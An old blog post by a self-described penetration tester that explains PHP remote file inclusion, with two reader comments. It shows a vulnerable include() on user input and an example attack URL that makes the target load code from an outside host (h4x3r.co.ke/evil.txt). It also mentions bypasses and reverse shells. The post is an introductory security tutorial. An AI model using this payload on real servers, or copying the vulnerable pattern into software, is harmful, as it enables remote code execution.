what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Wednesday, November 07, 2007

SOME BASIC REMOTE FILE INCLUSION

This also called RFI, its where the attacker tries to inject his own php code inside your php app. If an attacker is able to hit this then he could be able to execute any kind of code he wishes to on this webserver.

In a simple example, if the site is trying to do something like page=page.html to work out which page should be displayed, the code may look something like this:


$file =$_GET['page']; //The page we wish to display
include($file);
?>



If this vulnerability is experienced, this means the intruder can try to make the the code to try and run and pass down to the eg like this.

www.target.co.ke?page=www.h4x3r.co.ke/evil.txt?

So the vulnerable server will try to execute:


$file ="http://www.h4x3r.co.ke/evil.txt?"; //$_GET['page'];
include($file); //$file is the attackers script
?>



So the intruder has this executed. As u can see the attack script is having a .txt but we do put a question mark behind so as to be passed to the vulnerable website. Also we cant use a .php extension due to that we dont want the script to be executed on the attack machine.

This is the basic part on how to do it, u can google for more and advanced steps to undertake these attack, how to bypass restrictions and other ways like backconnecting and binding to the server remote shell interaction. Although this kind of attacks is dieing, u will still find it in alot of servers out there due to careless programming and luck of security audits on these servers. Also admins are to blame due to that they arent aware of how hacks are done and are new to these methods intruders use to pick gates, jump in and scroll in the server

Peace to all,

All the best

/Chuks

2 comments:

Athena said...

Hi,
stumbled upon this firefox add on:

https://addons.mozilla.org/en-US/firefox/addon/3899

that helps developers test for sql injection and simple security holes

chukjonia said...

Sometimes its not advicable to use tools, they can be very noisy. Nice post bro.